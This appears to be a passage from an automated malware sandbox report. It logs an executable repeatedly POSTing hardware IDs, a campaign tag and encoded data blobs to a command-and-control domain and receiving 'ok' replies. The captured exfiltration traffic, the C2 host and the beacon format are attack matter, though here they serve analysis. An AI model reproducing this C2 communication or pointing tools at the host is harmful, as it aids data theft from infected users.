                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 6b 57 62 65 49 71 44 47 7a 55 72 58 47 50 34 34 41 66 36 75 4b 33 79 37 32 30 6a 52 32 42 6e 77 79 62 47 35 61 6e 76 6f 71 62 54 56 62 4e 39 6b 2b 49 61 4c 43 70 59 53 35 6d 70 52 74 59 59 72 66 72 66 65 55 35 37 69 56 4f 57 49 71 2f 6c 71 66 61 4c 2b 2f 74 6c 6b 30 57 48 7a 69 63 68 4d 33 51 66 2b 4f 41 2f 34 6f 44 78 6f 74 64 78 50 33 38 6f 65 39 4d 43 78 73 47 5a 34 35 36 47 36 6b 53 2b 53 5a 65 44 47 6b 77 54 33 47 50 55 6d 41 2b 4b 6c 62 6e 48 2b 79 77 58 62 31 46 53 69 68 72 61 34 61 58 44 6d 71 4c 44 56 62 64 52 73 39 59 6e 4e 54 74 59 53 39 43 49 42 39 4b 67 6c 59 62 44 58 53 4e 6a 65 47 50 76 44 38 76 63 74 64 76 72 6d 35 70 46 50 31 57 48 71 78 50 35 48 32 42 76 35 50 45 6e 71 36 7a 63 75 74 39 34 46 68 4a 67 61 2f 38 6d 67 75 48 39 30 37 4c 53
                                                                                                            Data Ascii: kWbeIqDGzUrXGP44Af6uK3y720jR2BnwybG5anvoqbTVbN9k+IaLCpYS5mpRtYYrfrfeU57iVOWIq/lqfaL+/tlk0WHzichM3Qf+OA/4oDxotdxP38oe9MCxsGZ456G6kS+SZeDGkwT3GPUmA+KlbnH+ywXb1FSihra4aXDmqLDVbdRs9YnNTtYS9CIB9KglYbDXSNjeGPvD8vctdvrm5pFP1WHqxP5H2Bv5PEnq6zcut94FhJga/8mguH907LS
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 33 58 7a 78 50 35 48 32 42 76 35 50 45 6e 71 36 7a 63 75 74 39 34 46 68 4a 67 5a 38 73 4f 33 74 6d 78 37 37 4b 4f 30 33 57 6e 63 59 65 71 4a 7a 30 54 61 48 66 51 6e 42 2f 47 74 4a 32 57 37 31 45 58 64 30 6c 53 30 68 72 57 68 4c 53 6d 69 6b 72 6e 64 62 4e 30 67 7a 59 58 46 53 74 45 44 76 6a 56 48 37 4f 55 70 59 76 43 4b 42 64 44 52 46 50 48 4d 74 72 6c 71 66 4f 65 6c 75 64 4a 73 31 57 6a 32 67 63 39 49 33 78 6a 34 4b 67 37 78 6f 44 78 72 75 64 35 4a 6e 4a 5a 55 2f 64 37 79 34 53 31 65 35 62 43 39 2f 6d 4c 44 61 37 69 5a 68 56 32 57 45 76 4a 71 55 62 57 69 4b 32 61 37 31 45 33 63 79 68 48 30 7a 62 4f 7a 61 33 44 76 71 72 6a 52 59 4e 4a 6b 39 49 62 4d 51 38 51 48 2b 79 77 62 2f 2b 56 67 4c 72 66 4b 42 59 53 59 49 75 72 52 6f 36 38 76 52 4f 47 6f 73 4e 5a 33
                                                                                                            Data Ascii: 3XzxP5H2Bv5PEnq6zcut94FhJgZ8sO3tmx77KO03WncYeqJz0TaHfQnB/GtJ2W71EXd0lS0hrWhLSmikrndbN0gzYXFStEDvjVH7OUpYvCKBdDRFPHMtrlqfOeludJs1Wj2gc9I3xj4Kg7xoDxrud5JnJZU/d7y4S1e5bC9/mLDa7iZhV2WEvJqUbWiK2a71E3cyhH0zbOza3DvqrjRYNJk9IbMQ8QH+ywb/+VgLrfKBYSYIurRo68vROGosNZ3
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 44 4e 53 64 4d 61 39 44 67 42 2b 36 67 6c 59 62 76 41 52 64 48 63 47 50 37 4f 75 62 4d 74 50 36 4b 68 70 70 45 35 6b 6c 66 31 69 63 74 48 77 46 58 68 5a 42 43 31 6f 69 49 75 36 4a 4a 4a 30 74 67 62 39 73 71 35 73 57 78 39 37 4b 47 37 32 47 6e 61 63 50 6d 43 77 30 58 59 47 76 38 75 44 50 43 68 4b 57 71 32 33 51 57 53 6d 42 50 69 68 75 72 35 51 6c 62 58 35 4a 2f 72 49 63 30 73 34 63 62 4d 53 4a 5a 4e 76 69 59 4b 2b 61 30 68 61 4c 6e 65 54 39 58 54 47 50 48 43 76 72 42 6f 64 2b 4f 6a 75 39 42 6c 33 6d 6a 2b 68 63 68 4c 32 52 72 32 61 6b 65 31 6f 6a 59 75 36 4a 4a 67 79 39 4d 61 2f 49 61 74 39 33 51 78 35 61 72 2b 69 53 48 65 61 2f 36 41 7a 6b 6a 58 45 2f 59 76 41 66 47 6b 4b 47 69 7a 33 55 48 5a 32 52 76 2b 79 72 79 7a 62 48 44 75 72 62 48 61 5a 4a 49 73 75
                                                                                                            Data Ascii: DNSdMa9DgB+6glYbvARdHcGP7OubMtP6KhppE5klf1ictHwFXhZBC1oiIu6JJJ0tgb9sq5sWx97KG72GnacPmCw0XYGv8uDPChKWq23QWSmBPihur5QlbX5J/rIc0s4cbMSJZNviYK+a0haLneT9XTGPHCvrBod+Oju9Bl3mj+hchL2Rr2ake1ojYu6JJgy9Ma/Iat93Qx5ar+iSHea/6AzkjXE/YvAfGkKGiz3UHZ2Rv+yryzbHDurbHaZJIsu
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 51 46 50 73 67 42 66 4b 67 4a 57 47 38 6b 67 75 63 33 77 79 36 6e 76 4b 58 5a 6d 4c 31 70 62 44 61 64 38 6b 69 35 38 6a 53 42 4e 45 5a 76 6e 4a 4a 39 71 34 6c 61 72 44 65 52 64 6a 56 46 4f 6a 4a 74 62 35 6b 65 76 43 73 75 64 5a 71 32 6d 6e 33 67 4e 6c 49 32 41 66 37 4f 42 75 31 36 32 35 70 71 4a 49 64 6e 4f 34 54 36 74 61 78 2b 31 78 6e 34 62 43 31 33 47 32 53 66 62 61 66 69 30 50 61 56 61 5a 71 44 2f 71 73 4c 57 47 78 32 30 6e 52 33 52 33 2f 78 37 53 39 5a 33 76 69 6f 4c 6a 51 5a 4e 68 68 2b 59 7a 43 51 39 34 53 2f 54 68 4a 75 2b 55 70 64 76 43 4b 42 66 58 66 42 76 54 57 38 71 59 6a 61 4b 4b 68 73 70 45 35 6b 6d 62 79 69 63 39 44 32 68 50 37 4c 41 54 30 71 69 39 75 76 39 5a 4f 31 64 34 56 39 38 4f 2f 76 58 39 37 36 61 6d 79 32 47 33 66 49 72 62 47 7a 46
                                                                                                            Data Ascii: QFPsgBfKgJWG8kguc3wy6nvKXZmL1pbDad8ki58jSBNEZvnJJ9q4larDeRdjVFOjJtb5kevCsudZq2mn3gNlI2Af7OBu1625pqJIdnO4T6tax+1xn4bC13G2Sfbafi0PaVaZqD/qsLWGx20nR3R3/x7S9Z3vioLjQZNhh+YzCQ94S/ThJu+UpdvCKBfXfBvTW8qYjaKKhspE5kmbyic9D2hP7LAT0qi9uv9ZO1d4V98O/vX976amy2G3fIrbGzF
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 4b 77 2f 6e 70 53 4e 6b 6f 74 68 4f 32 64 55 5a 39 38 57 30 76 32 5a 39 38 4b 2b 2b 30 6d 71 53 4c 4c 69 42 30 77 53 4f 56 64 30 39 48 2f 2b 69 49 6e 69 37 30 30 62 4b 31 51 53 36 69 50 4b 6f 61 6d 43 69 2f 71 6a 42 64 74 56 39 74 70 2b 4c 51 39 70 56 70 6d 6f 50 2f 4b 4d 70 61 4c 37 41 51 4e 72 58 47 2f 50 50 74 72 46 75 63 65 61 69 75 64 52 69 33 6d 6e 2f 68 63 52 41 33 78 76 33 4a 55 6d 37 35 53 6c 32 38 49 6f 46 2f 63 4d 58 39 73 76 79 70 69 4e 6f 6f 71 47 79 6b 54 6d 53 62 76 61 44 79 30 37 51 45 66 73 73 41 2f 43 6c 4a 57 32 2f 31 6b 50 59 31 78 54 78 7a 37 4f 2f 61 48 76 70 6f 4c 50 53 5a 39 51 69 74 73 62 4d 58 4a 5a 4e 76 67 6f 53 2b 4b 6b 70 4c 71 2b 63 58 4a 7a 66 47 4c 71 65 38 72 4a 68 64 65 57 6d 73 39 4a 70 31 32 62 79 67 38 74 4d 78 42 33
                                                                                                            Data Ascii: Kw/npSNkothO2dUZ98W0v2Z98K++0mqSLLiB0wSOVd09H/+iIni700bK1QS6iPKoamCi/qjBdtV9tp+LQ9pVpmoP/KMpaL7AQNrXG/PPtrFuceaiudRi3mn/hcRA3xv3JUm75Sl28IoF/cMX9svypiNooqGykTmSbvaDy07QEfssA/ClJW2/1kPY1xTxz7O/aHvpoLPSZ9QitsbMXJZNvgoS+KkpLq+cXJzfGLqe8rJhdeWms9Jp12byg8tMxB3
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 2b 55 70 65 50 43 4b 42 65 4b 59 42 76 6e 57 73 62 5a 38 54 36 4c 2b 70 2b 38 68 32 58 54 2f 6c 73 68 53 33 52 6a 79 4f 7a 65 31 2f 58 6f 38 34 6f 41 58 6a 73 64 55 35 66 6e 38 2b 57 77 78 75 70 2b 6e 6b 58 65 53 4f 71 72 49 69 31 61 57 54 62 35 74 43 75 65 33 4b 47 32 6d 30 51 4c 69 35 6a 50 73 7a 4c 57 70 61 6d 62 74 35 76 43 52 62 70 49 36 77 63 62 43 51 38 30 45 36 43 63 5a 38 75 55 52 49 50 44 4b 42 59 53 59 49 66 6e 49 76 4c 35 37 59 4b 2b 42 71 4e 74 6d 77 6d 58 76 69 59 73 4b 6c 68 4f 2b 63 6c 71 37 35 53 70 2f 38 49 6f 56 6a 6f 4e 42 71 5a 48 69 36 33 49 2f 2b 2b 61 6f 6b 54 6d 41 4c 4c 69 55 69 78 79 57 55 76 30 34 47 2f 4f 6d 4f 47 33 33 37 48 76 37 77 68 6e 38 30 61 4f 48 55 33 62 34 71 37 6a 47 63 4a 35 33 2b 34 6a 46 51 38 42 56 73 47 6f 47
                                                                                                            Data Ascii: +UpePCKBeKYBvnWsbZ8T6L+p+8h2XT/lshS3RjyOze1/Xo84oAXjsdU5fn8+Wwxup+nkXeSOqrIi1aWTb5tCue3KG2m0QLi5jPszLWpambt5vCRbpI6wcbCQ80E6CcZ8uURIPDKBYSYIfnIvL57YK+BqNtmwmXviYsKlhO+clq75Sp/8IoVjoNBqZHi63I/++aokTmALLiUixyWUv04G/OmOG337Hv7whn80aOHU3b4q7jGcJ53+4jFQ8BVsGoG
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 44 77 31 6c 53 63 67 45 53 6f 6e 65 66 71 4f 69 47 77 75 66 44 49 49 63 51 69 6f 4e 53 46 42 4d 52 56 70 6d 70 4f 39 72 63 38 61 4c 50 45 52 70 76 6d 4b 74 33 49 74 62 68 37 59 66 57 70 67 4f 39 30 30 57 7a 32 67 64 31 56 6c 6c 75 2b 4a 55 6d 74 6e 47 34 6d 38 4f 30 4c 6e 4d 42 55 6f 6f 61 48 75 6d 4e 2f 35 62 43 76 6e 45 62 63 5a 66 6d 51 32 31 50 5a 56 62 42 71 44 37 58 39 66 43 44 77 31 6c 53 63 67 45 53 6f 6e 65 66 71 4f 69 47 77 75 66 44 49 49 63 51 69 6f 4e 53 46 42 4d 52 56 70 6d 70 4f 39 72 63 38 61 4c 50 45 52 70 76 6d 4b 74 33 49 74 62 68 37 59 66 57 70 38 66 39 58 38 31 7a 47 6b 38 68 4b 32 42 4c 6f 4f 30 6d 37 35 53 45 75 36 4f 73 46 6c 4a 67 72 74 49 61 71 2b 54 55 78 31 36 57 77 33 32 62 45 63 37 57 68 78 55 50 58 41 2b 34 39 42 72 71 4c 47
                                                                                                            Data Ascii: Dw1lScgESonefqOiGwufDIIcQioNSFBMRVpmpO9rc8aLPERpvmKt3Itbh7YfWpgO900Wz2gd1Vllu+JUmtnG4m8O0LnMBUooaHumN/5bCvnEbcZfmQ21PZVbBqD7X9fCDw1lScgESonefqOiGwufDIIcQioNSFBMRVpmpO9rc8aLPERpvmKt3Itbh7YfWp8f9X81zGk8hK2BLoO0m75SEu6OsFlJgrtIaq+TUx16Ww32bEc7WhxUPXA+49BrqLG
                                                                                                            2024-12-18 20:17:12 UTC1369INData Raw: 42 79 73 30 58 36 73 47 4d 68 30 42 6a 35 62 61 39 6b 31 44 45 59 66 69 49 7a 41 53 59 56 65 5a 71 55 62 57 49 50 47 6d 67 30 51 57 53 6d 42 69 36 6e 76 4b 30 66 33 62 79 70 66 4c 57 65 39 55 69 35 38 6a 53 42 4d 42 56 70 6e 6c 48 74 62 64 75 4e 76 43 56 53 39 48 5a 46 2f 54 46 6f 4b 74 72 63 76 53 6c 2b 65 39 66 2f 33 44 2f 6c 73 67 47 35 78 6a 36 50 42 7a 32 74 53 6c 51 6a 76 39 58 32 38 67 58 75 4f 71 31 74 47 46 50 33 4a 47 76 31 6e 47 51 52 50 75 51 79 41 53 59 56 65 5a 71 55 62 57 49 50 47 6d 67 30 51 66 77 33 78 6e 32 68 71 33 33 64 44 48 30 35 75 61 43 4c 35 4a 77 75 4e 36 4c 41 39 55 48 37 43 77 4b 34 36 5a 70 55 49 37 2f 56 39 76 49 46 37 6a 33 76 37 31 37 5a 4f 47 32 75 65 39 66 2f 33 44 2f 6c 73 67 47 38 79 2b 38 47 78 2f 32 70 53 42 70 38 4a
                                                                                                            Data Ascii: Bys0X6sGMh0Bj5ba9k1DEYfiIzASYVeZqUbWIPGmg0QWSmBi6nvK0f3bypfLWe9Ui58jSBMBVpnlHtbduNvCVS9HZF/TFoKtrcvSl+e9f/3D/lsgG5xj6PBz2tSlQjv9X28gXuOq1tGFP3JGv1nGQRPuQyASYVeZqUbWIPGmg0Qfw3xn2hq33dDH05uaCL5JwuN6LA9UH7CwK46ZpUI7/V9vIF7j3v717ZOG2ue9f/3D/lsgG8y+8Gx/2pSBp8J


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.749723172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:14 UTC280OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=QIX7HBIA1S9Y5Q48LYY
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 12850
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:14 UTC12850OUTData Raw: 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                            Data Ascii: --QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="pid"2--QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                            2024-12-18 20:17:17 UTC1035INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=h6v1kmo0k4p280bicrid0d1998; expires=Sun, 13-Apr-2025 14:03:54 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLpIAJeqHNSLgSykLf9VMwzsPj%2Fmx5%2FiaqVZEzzfFJeyzOHeB48%2FfSDHK0pF94YV4QYTmQPLozLe0yXH1mv4KJfjw%2BWvynUxsQqs7151zkkxqbZisoz4kX6qfqiyyMZI"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d5d24fc0433a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1741&rtt_var=668&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13788&delivery_rate=1677197&cwnd=242&unsent_bytes=0&cid=0fe9af7194ea3787&ts=3207&x=0"
                                                                                                            2024-12-18 20:17:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-18 20:17:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749735172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:19 UTC272OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=XGGIGRETO6J
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15034
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:19 UTC15034OUTData Raw: 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74
                                                                                                            Data Ascii: --XGGIGRETO6JContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--XGGIGRETO6JContent-Disposition: form-data; name="pid"2--XGGIGRETO6JContent-Disposition: form-data; name="lid"PsFKDg--pablo--XGGIGRETO6JCont
                                                                                                            2024-12-18 20:17:23 UTC1031INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:23 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=1d2h5h2hfgfveajcie3n8ftuvd; expires=Sun, 13-Apr-2025 14:03:59 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BToEVgXlKWSufTTxgSWhu81I%2FeLx%2F6FnbmSuKwBmI1IBhPqLD3QJHJCpVqWSBZ5H9dvj0UfjhRey4WTsVUPBW5DEfTJPtYEizy8p4hQWyd7KGa5qdXlLskS9uznipFSe"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d5f11aaec32c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1710&rtt_var=656&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15964&delivery_rate=1648785&cwnd=171&unsent_bytes=0&cid=59ae42e73ffec287&ts=4596&x=0"
                                                                                                            2024-12-18 20:17:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-18 20:17:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.749754172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:25 UTC274OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=0PD9BVQSDHL2J
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20371
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:25 UTC15331OUTData Raw: 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c
                                                                                                            Data Ascii: --0PD9BVQSDHL2JContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--0PD9BVQSDHL2JContent-Disposition: form-data; name="pid"3--0PD9BVQSDHL2JContent-Disposition: form-data; name="lid"PsFKDg--pablo--0PD9BVQSDHL
                                                                                                            2024-12-18 20:17:25 UTC5040OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                            2024-12-18 20:17:29 UTC1037INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=h3t50kuakhcvf39vfvr7v0thch; expires=Sun, 13-Apr-2025 14:04:06 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zv1ttGBnN4Mc5%2F0GjL%2BLzGBzkEEAE63j3ibPKufRS3IHB4oHxq2M3W2d5l2TVDbJH%2BdxqBm7QqRu2OXenBROfGdRwgvCT%2BvtnQyVX0PZ3mXcSQCe0qB0sNec%2BP5nxoRx"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d616f84643c3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1723&rtt_var=937&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21325&delivery_rate=1010730&cwnd=211&unsent_bytes=0&cid=d195f03e6bb15e4e&ts=3934&x=0"
                                                                                                            2024-12-18 20:17:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-18 20:17:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.749765172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:30 UTC273OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=2ODPF2AH7FW6G
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1206
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:30 UTC1206OUTData Raw: 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57
                                                                                                            Data Ascii: --2ODPF2AH7FW6GContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--2ODPF2AH7FW6GContent-Disposition: form-data; name="pid"1--2ODPF2AH7FW6GContent-Disposition: form-data; name="lid"PsFKDg--pablo--2ODPF2AH7FW
                                                                                                            2024-12-18 20:17:34 UTC1028INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
